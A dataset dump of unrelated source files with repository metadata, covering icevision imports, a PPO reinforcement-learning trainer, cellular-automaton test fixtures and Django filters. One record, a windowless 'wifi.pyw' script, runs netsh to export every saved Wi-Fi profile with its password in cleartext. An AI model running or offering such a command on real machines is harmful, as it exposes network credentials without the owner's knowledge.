| 41.335161 | 114 | 0.607995 | 5,777 | 52,785 | 5.404189 | 0.06197 | 0.052755 | 0.050384 | 0.062012 | 0.881582 | 0.862076 | 0.83581 | 0.823254 | 0.815919 | 0.810955 | 0 | 0.004198 | 0.300521 | 52,785 | 1,276 | 115 | 41.367555 | 0.841368 | 0.406934 | 0 | 0.652893 | 1 | 0 | 0.251995 | 0.186109 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047934 | false | 0.023141 | 0.023141 | 0 | 0.130579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
657e7abfdaee394f8c7699d2e20f738499d5f3bc | 639 | py | Python | icevision/models/mmdet/models/__init__.py | dnth/icevision | 80845bf97f47ecef2d0c153b7628d4fb59f53b9e | [
"Apache-2.0"
] | null | null | null | icevision/models/mmdet/models/__init__.py | dnth/icevision | 80845bf97f47ecef2d0c153b7628d4fb59f53b9e | [
"Apache-2.0"
] | null | null | null | icevision/models/mmdet/models/__init__.py | dnth/icevision | 80845bf97f47ecef2d0c153b7628d4fb59f53b9e | [
"Apache-2.0"
] | null | null | null | # object detection
from icevision.models.mmdet.models import faster_rcnn
from icevision.models.mmdet.models import yolox
from icevision.models.mmdet.models import retinanet
from icevision.models.mmdet.models import fcos
from icevision.models.mmdet.models import tood
from icevision.models.mmdet.models import vfnet
from icevision.models.mmdet.models import cornernet
from icevision.models.mmdet.models import centripetalnet
from icevision.models.mmdet.models import sparse_rcnn
from icevision.models.mmdet.models import ssd
from icevision.models.mmdet.models import detr
# segmentation
from icevision.models.mmdet.models import mask_rcnn
| 39.9375 | 56 | 0.856025 | 90 | 639 | 6.044444 | 0.233333 | 0.286765 | 0.419118 | 0.529412 | 0.808824 | 0.808824 | 0.147059 | 0 | 0 | 0 | 0 | 0 | 0.084507 | 639 | 15 | 57 | 42.6 | 0.929915 | 0.045383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
65991f4beee1a2d7e5321c9f54a58e4f290c9a60 | 14,959 | py | Python | core/algorithms/lacie/lacie_ppo.py | lehduong/Input-Dependent-Baseline | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | 4 | 2020-12-05T18:51:03.000Z | 2022-01-03T16:04:35.000Z | core/algorithms/lacie/lacie_ppo.py | lehduong/Job-Scheduling-with-Reinforcement-Learning | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | null | null | null | core/algorithms/lacie/lacie_ppo.py | lehduong/Job-Scheduling-with-Reinforcement-Learning | cb140338eb35a568fe1d320d0b8e52b739470b59 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from itertools import chain
from .base_lacie import LacieAlgo
class LACIE_PPO(LacieAlgo):
def __init__(self,
actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq=None,
lr=None,
eps=None,
max_grad_norm=None,
use_clipped_value_loss=True,
expert=None,
il_coef=1,
num_cpc_steps=10,
cpc_lr=1e-3):
super().__init__(actor_critic=actor_critic,
lr=lr,
value_coef=value_loss_coef,
entropy_coef=entropy_coef,
regularize_coef=regularize_coef,
state_to_input_seq=state_to_input_seq,
expert=expert,
il_coef=il_coef,
num_cpc_steps=num_cpc_steps,
cpc_lr=cpc_lr)
self.clip_param = clip_param
self.ppo_epoch = ppo_epoch
self.num_mini_batch = num_mini_batch
self.max_grad_norm = max_grad_norm
self.use_clipped_value_loss = use_clipped_value_loss
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
# contrastive learning loss
contrastive_loss_epoch, contrastive_accuracy_epoch = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
contrastive_loss_epoch = contrastive_loss_epoch.item()
# weighted advantages
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
weighted_advantages = (weighted_advantages - weighted_advantages.mean()) / (
weighted_advantages.std() + 1e-5)
value_loss_epoch = 0
action_loss_epoch = 0
dist_entropy_epoch = 0
imitation_loss_epoch = 0
accuracy_epoch = 0
for e in range(self.ppo_epoch):
if self.actor_critic.is_recurrent:
data_generator = rollouts.recurrent_generator(
weighted_advantages, self.num_mini_batch)
else:
data_generator = rollouts.feed_forward_generator(
weighted_advantages, self.num_mini_batch)
for sample in data_generator:
obs_batch, recurrent_hidden_states_batch, actions_batch, \
value_preds_batch, return_batch, masks_batch, old_action_log_probs_batch, \
adv_targ = sample
# Reshape to do in a single forward pass for all steps
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
obs_batch, recurrent_hidden_states_batch, masks_batch,
actions_batch)
ratio = torch.exp(action_log_probs -
old_action_log_probs_batch)
surr1 = ratio * adv_targ
surr2 = torch.clamp(ratio, 1.0 - self.clip_param,
1.0 + self.clip_param) * adv_targ
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + \
(values - value_preds_batch).clamp(-self.clip_param,
self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch).pow(2)
value_loss = 0.5 * torch.max(value_losses,
value_losses_clipped).mean()
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
# imitation learning
imitation_loss, accuracy = torch.tensor(
0).to(action_loss.device), 0
if self.expert:
imitation_loss, accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
# contrastive learning density ratio
contrastive_loss, _ = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages)
self.optimizer.zero_grad()
self.cpc_optimizer.zero_grad()
(imitation_loss * self.il_coef * self.value_coef + action_loss -
dist_entropy * self.entropy_coef + contrastive_loss).backward()
nn.utils.clip_grad_norm_(chain(self.actor_critic.parameters(),
self.input_seq_encoder.parameters(),
self.advantage_encoder.parameters(),
self.state_encoder.parameters(),
self.condition_encoder.parameters(),
self.action_encoder.parameters()),
self.max_grad_norm)
self.optimizer.step()
self.cpc_optimizer.step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
dist_entropy_epoch += dist_entropy.item()
imitation_loss_epoch += imitation_loss.item()
accuracy_epoch += accuracy
num_updates = self.ppo_epoch * self.num_mini_batch
value_loss_epoch /= num_updates
action_loss_epoch /= num_updates
dist_entropy_epoch /= num_updates
imitation_loss_epoch /= num_updates
accuracy_epoch /= num_updates
self.after_update()
return {
"value loss": value_loss_epoch,
"action loss": action_loss_epoch,
"entropy loss": dist_entropy_epoch,
"imitation loss": imitation_loss_epoch,
"accuracy": accuracy_epoch,
"contrastive loss": contrastive_loss_epoch,
"contrastive accuracy": contrastive_accuracy_epoch
}
class LACIE_PPO_Memory(LACIE_PPO):
def __init__(self,
actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq=None,
lr=None,
eps=None,
max_grad_norm=None,
use_clipped_value_loss=True,
expert=None,
il_coef=1,
num_cpc_steps=10,
lacie_buffer=None,
lacie_batch_size=64,
use_memory_to_pred_weights=False,
cpc_lr=1e-3):
super().__init__(actor_critic,
clip_param,
ppo_epoch,
num_mini_batch,
value_loss_coef,
entropy_coef,
regularize_coef,
state_to_input_seq,
lr,
eps,
max_grad_norm,
use_clipped_value_loss,
expert,
il_coef,
num_cpc_steps,
cpc_lr=cpc_lr)
self.lacie_buffer = lacie_buffer
self.lacie_buffer_size = lacie_batch_size
self.use_memory_to_pred_weights = use_memory_to_pred_weights
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
advantages = rollouts.returns[:-1] - rollouts.value_preds[:-1]
# update LACIE_Storage
self.lacie_buffer.insert(rollouts, advantages.detach())
# contrastive learning loss
contrastive_loss_epoch, contrastive_accuracy_epoch, regularize_loss_epoch = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
contrastive_loss_epoch = contrastive_loss_epoch.item()
regularize_loss_epoch = regularize_loss_epoch.item()
# ---------------------------------------------------------------------------
# learn cpc model for n steps
for _ in range(self.num_cpc_steps):
data = self.lacie_buffer.sample()
obs, actions, masks, sample_advantages = data['obs'], data['actions'], data['masks'], data['advantages']
cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
obs, actions, masks, sample_advantages)
self.cpc_optimizer.zero_grad()
(cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
self.input_seq_encoder.parameters(),
self.state_encoder.parameters(),
self.condition_encoder.parameters(),
self.action_encoder.parameters()),
self.max_grad_norm)
self.cpc_optimizer.step()
# weighted advantages
if not self.use_memory_to_pred_weights:
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
else:
data = self.lacie_buffer.sample_most_recent()
obs, actions, masks, sample_advantages = data['obs'], data[
'actions'], data['masks'], data['advantages']
weighted_advantages = self.compute_weighted_advantages(
obs, actions, masks, sample_advantages, rollouts.actions.shape[1])
# normalize advantages
# TODO: Conduct Ablation Study to verify if we should normalize the advantages or not
weighted_advantages = (weighted_advantages - weighted_advantages.mean()) / (
weighted_advantages.std() + 1e-5)
# ---------------------------------------------------------------------------
# learn actor and critic
value_loss_epoch = 0
action_loss_epoch = 0
dist_entropy_epoch = 0
imitation_loss_epoch = 0
accuracy_epoch = 0
for e in range(self.ppo_epoch):
if self.actor_critic.is_recurrent:
data_generator = rollouts.recurrent_generator(
weighted_advantages, self.num_mini_batch)
else:
data_generator = rollouts.feed_forward_generator(
weighted_advantages, self.num_mini_batch)
for sample in data_generator:
obs_batch, recurrent_hidden_states_batch, actions_batch, \
value_preds_batch, return_batch, masks_batch, old_action_log_probs_batch, \
adv_targ = sample
# Reshape to do in a single forward pass for all steps
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
obs_batch, recurrent_hidden_states_batch, masks_batch,
actions_batch)
ratio = torch.exp(action_log_probs -
old_action_log_probs_batch)
surr1 = ratio * adv_targ
surr2 = torch.clamp(ratio, 1.0 - self.clip_param,
1.0 + self.clip_param) * adv_targ
action_loss = -torch.min(surr1, surr2).mean()
if self.use_clipped_value_loss:
value_pred_clipped = value_preds_batch + \
(values - value_preds_batch).clamp(-self.clip_param,
self.clip_param)
value_losses = (values - return_batch).pow(2)
value_losses_clipped = (
value_pred_clipped - return_batch).pow(2)
value_loss = 0.5 * torch.max(value_losses,
value_losses_clipped).mean()
else:
value_loss = 0.5 * (return_batch - values).pow(2).mean()
# imitation learning
imitation_loss, accuracy = torch.tensor(
0).to(action_loss.device), 0
if self.expert:
imitation_loss, accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
self.optimizer.zero_grad()
(imitation_loss * self.il_coef * self.value_coef + action_loss -
dist_entropy * self.entropy_coef).backward()
nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.max_grad_norm)
self.optimizer.step()
value_loss_epoch += value_loss.item()
action_loss_epoch += action_loss.item()
dist_entropy_epoch += dist_entropy.item()
imitation_loss_epoch += imitation_loss.item()
accuracy_epoch += accuracy
num_updates = self.ppo_epoch * self.num_mini_batch
value_loss_epoch /= num_updates
action_loss_epoch /= num_updates
dist_entropy_epoch /= num_updates
imitation_loss_epoch /= num_updates
accuracy_epoch /= num_updates
self.after_update()
return {
"value loss": value_loss_epoch,
"action loss": action_loss_epoch,
"entropy loss": dist_entropy_epoch,
"imitation loss": imitation_loss_epoch,
"accuracy": accuracy_epoch,
"contrastive loss": contrastive_loss_epoch,
"contrastive accuracy": contrastive_accuracy_epoch,
"regularization loss": regularize_loss_epoch
}
| 43.868035 | 116 | 0.53914 | 1,475 | 14,959 | 5.088814 | 0.105763 | 0.043165 | 0.017586 | 0.017719 | 0.868239 | 0.819877 | 0.806155 | 0.785505 | 0.767253 | 0.739408 | 0 | 0.008745 | 0.380841 | 14,959 | 340 | 117 | 43.997059 | 0.801663 | 0.040043 | 0 | 0.764493 | 0 | 0 | 0.0175 | 0 | 0 | 0 | 0 | 0.002941 | 0 | 1 | 0.014493 | false | 0 | 0.021739 | 0 | 0.050725 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
659f142ea9d518b62ae4e2c8ea36aca31095e0f5 | 112 | py | Python | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | null | null | null | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | 13 | 2020-07-03T20:09:05.000Z | 2022-02-28T23:35:56.000Z | tests/fixtures/fixture_module_w_class.py | irvingleonard/simplifiedapp | aeb3353df1d5110f0cd4ae33465bc9a2f0190173 | [
"BSD-2-Clause"
] | 1 | 2021-08-30T22:19:02.000Z | 2021-08-30T22:19:02.000Z | class TestClass:
def __init__(self, *args, **kwargs):
pass
def test_method(self, *args, **kwargs):
pass
| 14 | 40 | 0.669643 | 15 | 112 | 4.666667 | 0.666667 | 0.228571 | 0.4 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 112 | 7 | 41 | 16 | 0.76087 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
65c7ea694fcf1fdd9458e5fd5657d561d9cadab2 | 86 | py | Python | AI/day03/XRAI/Submit/network.py | Ersikan/Pool2021 | cc64658039dee04127a3a641f891781c53647244 | [
"MIT"
] | 16 | 2021-03-09T10:25:18.000Z | 2022-02-08T14:29:24.000Z | AI/day03/XRAI/Submit/network.py | Ersikan/Pool2021 | cc64658039dee04127a3a641f891781c53647244 | [
"MIT"
] | null | null | null | AI/day03/XRAI/Submit/network.py | Ersikan/Pool2021 | cc64658039dee04127a3a641f891781c53647244 | [
"MIT"
] | 3 | 2021-02-10T09:32:21.000Z | 2022-02-01T17:07:59.000Z | import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F | 17.2 | 31 | 0.802326 | 17 | 86 | 4.058824 | 0.470588 | 0.478261 | 0.376812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 86 | 5 | 31 | 17.2 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
65dacdaea6e0d65851b242381b2a977e5fcb856d | 109 | pyw | Python | network/wifi.pyw | simdok/Dedsecurity | 62c6c2827b3b4c2d563ef09b4780716bfc94674f | [
"MIT"
] | 10 | 2020-12-12T11:20:10.000Z | 2021-04-16T17:46:32.000Z | network/wifi.pyw | simdok/Dedsecurity | 62c6c2827b3b4c2d563ef09b4780716bfc94674f | [
"MIT"
] | null | null | null | network/wifi.pyw | simdok/Dedsecurity | 62c6c2827b3b4c2d563ef09b4780716bfc94674f | [
"MIT"
] | 8 | 2020-10-19T17:53:11.000Z | 2021-06-22T15:51:58.000Z | import os
os.system("netsh wlan show profile")
os.system("netsh wlan export profile folder=C:\ key=clear")
| 18.166667 | 59 | 0.743119 | 18 | 109 | 4.5 | 0.666667 | 0.197531 | 0.320988 | 0.419753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12844 | 109 | 5 | 60 | 21.8 | 0.852632 | 0 | 0 | 0 | 0 | 0 | 0.638889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
65ef3da6997bdedc48b8d1e9380d814c976f391b | 3,386 | py | Python | tests/Totalistic2D_knowns.py | godzilla-but-nicer/cellularautomata | 16c1d31403a26131f1e18f5d72b96a316082e596 | [
"MIT"
] | null | null | null | tests/Totalistic2D_knowns.py | godzilla-but-nicer/cellularautomata | 16c1d31403a26131f1e18f5d72b96a316082e596 | [
"MIT"
] | null | null | null | tests/Totalistic2D_knowns.py | godzilla-but-nicer/cellularautomata | 16c1d31403a26131f1e18f5d72b96a316082e596 | [
"MIT"
] | null | null | null | import numpy as np
gol_glider = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]])
gol_glider_next = np.array([[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 1, 1, 0],
[0, 0, 1, 0, 0]])
gol_series = np.array([[[0, 0, 0, 0, 0, 0], # 0
[0, 1, 0, 1, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 1, 0, 1, 0, 1],
[0, 1, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 1
[0, 1, 0, 1, 0, 0],
[0, 1, 0, 1, 1, 0],
[0, 1, 0, 1, 1, 0],
[1, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 2
[0, 0, 0, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[0, 1, 1, 0, 1, 1],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 3
[0, 0, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 4
[0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 5
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]],
[[0, 0, 0, 0, 0, 0], # 6
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]])
dl_glider = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 2, 0],
[0, 2, 2, 2, 0],
[0, 0, 0, 0, 0]])
dl_glider_next = np.array([[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 2, 0],
[0, 1, 2, 2, 0],
[0, 0, 2, 0, 0]])
dl_series = np.array([[[0, 2, 0, 1], # 0
[2, 1, 2, 0],
[0, 1, 1, 0],
[0, 0, 0, 2]],
[[2, 2, 2, 1], # 1
[1, 0, 1, 0],
[0, 2, 2, 2],
[0, 0, 0, 1]],
[[1, 2, 1, 0], # 2
[0, 0, 0, 0],
[0, 1, 2, 1],
[0, 0, 0, 0]],
[[1, 1, 1, 0], # 3
[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 0, 0, 0]]])
| 35.642105 | 48 | 0.162729 | 457 | 3,386 | 1.188184 | 0.037199 | 0.972376 | 1.21547 | 1.362799 | 0.88582 | 0.867403 | 0.837937 | 0.813996 | 0.734807 | 0.697974 | 0 | 0.360034 | 0.649734 | 3,386 | 94 | 49 | 36.021277 | 0.097808 | 0.006202 | 0 | 0.518987 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012658 | 0 | 0.012658 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
02a446556e727451894dbd3c911d8d42453198ad | 254,122 | py | Python | archiv/filters.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | null | null | null | archiv/filters.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 6 | 2020-06-05T18:32:02.000Z | 2022-02-10T07:22:24.000Z | archiv/filters.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 1 | 2020-06-30T13:52:41.000Z | 2020-06-30T13:52:41.000Z | # generated by appcreator
import django_filters
from django import forms
from dal import autocomplete
from vocabs.filters import generous_concept_filter
from vocabs.models import SkosConcept
from . models import (
Actor,
ArchaeologicalObject4DPuzzleID,
ArchaeologicalObjectID,
ArchiveINF,
AutoCAD,
Convolutecards,
Datenbase,
Document4DPuzzleID,
DocumentTypes,
ExcavationObjectID,
ExcavationSeasons,
Fielddrawing,
Film,
Finddrawing,
Findsheets,
Fotoborndigital,
Fotosgescannt,
Fundinventar4DPuzzleID,
FundinventarInventarnummern,
FundinventarKonvolutnummern,
FundinventarMaterialproben,
FundinventarSteininventar,
GIS,
Geophysics,
Inventorybooks,
PhasenID,
Protocols,
StratenID,
Tables,
ThreeDimensionalModel,
Videos,
WallpaintingInventory
)
class ActorListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('legacy_id').help_text,
label=Actor._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('fc_name').help_text,
label=Actor._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('fc_directory').help_text,
label=Actor._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('fc_type').help_text,
label=Actor._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('fc_filename').help_text,
label=Actor._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('fc_extension').help_text,
label=Actor._meta.get_field('fc_extension').verbose_name
)
name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('name').help_text,
label=Actor._meta.get_field('name').verbose_name
)
drawer_monogram = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('drawer_monogram').help_text,
label=Actor._meta.get_field('drawer_monogram').verbose_name
)
excavation = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('excavation').help_text,
label=Actor._meta.get_field('excavation').verbose_name
)
xx_4dpuzzle = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('xx_4dpuzzle').help_text,
label=Actor._meta.get_field('xx_4dpuzzle').verbose_name
)
year = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Actor._meta.get_field('year').help_text,
label=Actor._meta.get_field('year').verbose_name
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Actor._meta.get_field('access').help_text,
label=Actor._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Actor
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'name',
'drawer_monogram',
'excavation',
'xx_4dpuzzle',
'year',
'access',
]
class ArchaeologicalObject4DPuzzleIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('legacy_id').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_name').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_directory').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_type').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_filename').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_extension').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('fc_extension').verbose_name
)
archaeological_object_4dpuzzle_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_4dpuzzle_id').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_4dpuzzle_id').verbose_name
)
archaeological_object_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_comment').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_comment').verbose_name
)
position = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('position').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('position').verbose_name
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_comment').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('digitisation_comment').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
)
archaeological_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="archaeological_object_type"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_type').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('archaeological_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/archaeological_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
stratum_id_relative = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_id_relative"
),
help_text=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_relative').help_text,
label=ArchaeologicalObject4DPuzzleID._meta.get_field('stratum_id_relative').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_id_relative",
attrs={
'data-placeholder': 'Autocomplete ...',
